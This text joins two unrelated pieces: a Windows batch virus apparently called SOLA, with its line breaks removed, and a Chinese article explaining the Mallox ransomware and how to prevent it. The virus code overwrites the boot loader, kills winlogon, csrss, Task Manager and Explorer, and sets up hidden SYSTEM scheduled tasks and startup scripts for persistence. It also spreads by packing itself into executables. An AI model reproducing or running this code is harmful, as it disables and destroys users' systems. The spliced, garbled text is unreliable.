S=1if "%T%"=="2" vol T:&if errorlevel 1 set T=1if "%U%"=="2" vol U:&if errorlevel 1 set U=1if "%V%"=="2" vol V:&if errorlevel 1 set V=1if "%W%"=="2" vol W:&if errorlevel 1 set W=1if "%X%"=="2" vol X:&if errorlevel 1 set X=1if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist "%runroot%\SOLA.VBS" copy "%sola%\SOLA.VBS" "%runroot%\SOLA.VBS"if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"sleep 2000goto Turn::End of Rungoto End&if errorlevel 1 exit::End of Run:Virusif not "%Runtime%"=="0" goto VirusChkset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txtcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"echo On Error Resume Next>TENBATSU.VBSecho set ws=wscript.createobject("wscript.shell")>>TENBATSU.VBSecho ws.run "%sola%\sola.bat -Tenbatsu",0 >>TENBATSU.VBSgoto Diskchk:VirusChkif not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS" goto Kill goto Diskchk:Tenbatsu:KillNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %systemdrive%\NTLDR %sola%\NTLDRecho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +r:PauseSFCstart mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()":KillTaskmgrdel /q /a %systemroot%\system32\dllcache\taskmgr.exetaskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe taskmgr.xxx & if errorlevel 1 start mshta "javascript:newActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500ren %systemroot%\system32\taskmgr.exe taskmgr.xxx:KillExplorertaskkill /f /im explorer.exe >nul& if errorlevel 1ren %systemroot%\system32\explorer.exe explorer.xxx & start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pnexplorer.exe',0);window.close()" & sleep 500ren %systemroot%\explorer.exe explorer.xxxstart /max %setup%\TENBATSU.BAT:Timesetsleep 660000if exist %sola%\Killself Exit:Killattrib %systemdrive%\NTLDR -s -h -recho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +rtasklist >%sola%\Task.txtFOR /F "tokens=2" %%i in ('findstr /I "csrss.exe" "%sola%\Task.txt"') do ntsd -p %%i goto Diskchk:KillSelf:StartExplorerren %systemroot%\explorer.xxx explorer.exestart %systemroot%\explorer.exe:BackNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %sola%\NTLDR %systemdrive%\NTLDRattrib %systemdrive%\NTLDR +s +h +r:RenTmgren %systemroot%\system32\taskmgr.xxx taskmgr.exe:KillViruscopy %setup%\KillVirus.txt %sola%\KillVirus.txtC:cd\md ~Installcd ~Installrar x -hpkakenhi200601 %setup%\SolaKiller.rarmshta "javascript:newActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()"rd /s /q %setup%attrib %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"if exist sola.vbs del sola.vbsif exist tenbatsu.vbs del tenbatsu.vbsstart %systemroot%\system32\notepad.exe %sola%\KillVirus.txtdel %sola%\sola.batExit:Openif "%1"=="-USB" Exitgoto GetName:BackOpenif not exist "%Name%" exitcall "%Name%":SaveFOR /F "delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%i rar -m0 -ep -ep1 a "%PackName%" "%Name%"echo %Code%>>"%PackName%":Delattrib "%Name%" -s -h -rdel "%Name%"attrib Function.dll -s -h -rdel Function.dllattrib %0 -s -h -rdel %0exit::CMD program will stop there.:GetNameset Code=SOLA_2.0_1913127307334set Name=hardcfg使用说明.txtgoto Backopen:End。

什么是malloxx勒索病毒，服务器中malloxx勒索病毒了怎么办？Malloxx勒索病毒是一种新型的电脑病毒，它通过加密用户电脑中的重要文件数据来威胁用户，并以此勒索钱财。

这种病毒并不是让用户的电脑瘫痪，而是以非常独特的方式进行攻击。

在感染了Malloxx勒索病毒后，它会加密用户服务器中的数据，并将其传送回黑客的服务器，然后通过网页或桌面生成的勒索信通知用户，告知其关键文件已被加密，并要求支付一定金额的赎金。

Malloxx勒索病毒的攻击方式主要是通过爆破远程桌面获取远程桌面登录密码，然后利用这些密码登录到用户的机器上进行手动投毒。

这种攻击方式非常危险，因为即使在安全软件的保护下，黑客仍然能够通过这种方式获得用户的密码并入侵其电脑。

被Malloxx勒索病毒攻击的用户通常是较大型的企业、工厂、商超，以及医院、教育机构等。

一旦被攻击，用户的数据就会被加密并被要求支付赎金。

如果不支付赎金，黑客通常会威胁将用户的数据公开或删除，这将会对用户造成不可估量的损失。

Malloxx勒索病毒的防范措施主要是加强系统的安全性。

用户应该定期更新自己的操作系统和应用软件，以确保系统没有漏洞。

同时，用户还应该安装有效的安全软件，例如防病毒软件和防火墙等。

此外，用户还应该注意不要随意下载和打开未知来源的文件和链接，以及不要使用弱密码或重复使用密码等。

如果用户的电脑已经被Malloxx勒索病毒攻击，最好的方法是立即联系专业的数据安全工程师或机构进行救援。

他们可以帮助用户恢复被加密的数据并清除病毒，以尽可能减少损失。

同时，用户还应该备份重要的数据，以防止类似的情况再次发生。

总之，Malloxx勒索病毒是一种非常危险的电脑病毒，它以独特的攻击方式威胁用户的数据安全。

因此，用户应该加强系统的安全性，并采取有效的防范措施来避免被攻击。

如果已经被攻击，用户应该立即寻求专业的救援帮助，以尽可能减少损失。